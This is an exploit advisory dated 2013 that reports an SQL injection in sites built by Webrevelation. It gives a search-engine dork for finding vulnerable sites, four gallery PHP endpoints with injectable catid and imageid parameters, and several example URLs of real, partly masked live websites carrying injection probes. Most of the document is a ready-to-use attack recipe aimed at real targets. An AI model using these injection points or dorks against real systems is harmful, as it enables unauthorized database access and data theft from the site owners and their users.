===========================================================
Site by Webrevelation SQL Injection Vulnerability
===========================================================
:-----------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Site by Webrevelation SQL Injection Vulnerability
: # Date : 03 May 2013
: # Author : X-Cisadane
: # Vendor : www.webrevelation.com
: # Version : All Versions
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability
: # Tested On : Google Chrome 24.0.1312.52 m (Windows XP Professional SP 3 32-Bit EN US)
: # Greetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Jakarta Anonymous Club, Bogor-H, Mantan Gw
:-----------------------------------------------------------------------------------------------------------------------:
DORKS (How to find the target) :
intext:"Site by Webrevelation"
Proof of Concept
=================
http://[Site]/[Path]/gallery_images.php?catid=['SQLi]
http://[Site]/[Path]/gallery_image.php?imageid=['SQLi]
http://[Site]/[Path]/photogallery.php?catid=['SQLi]
http://[Site]/[Path]/photo_categories.php?catid=['SQLi]
Example :
http://brusXXXusters.net/html/gallery_images.php?catid='5
http://www.ocoXXrslawn.com/html/gallery_images.php?catid=-10
http://www.lachXmaison.com/html/gallery_images.php?catid='20
http://www.croXoak.org/html/photo_categories.php?catid=-17
...
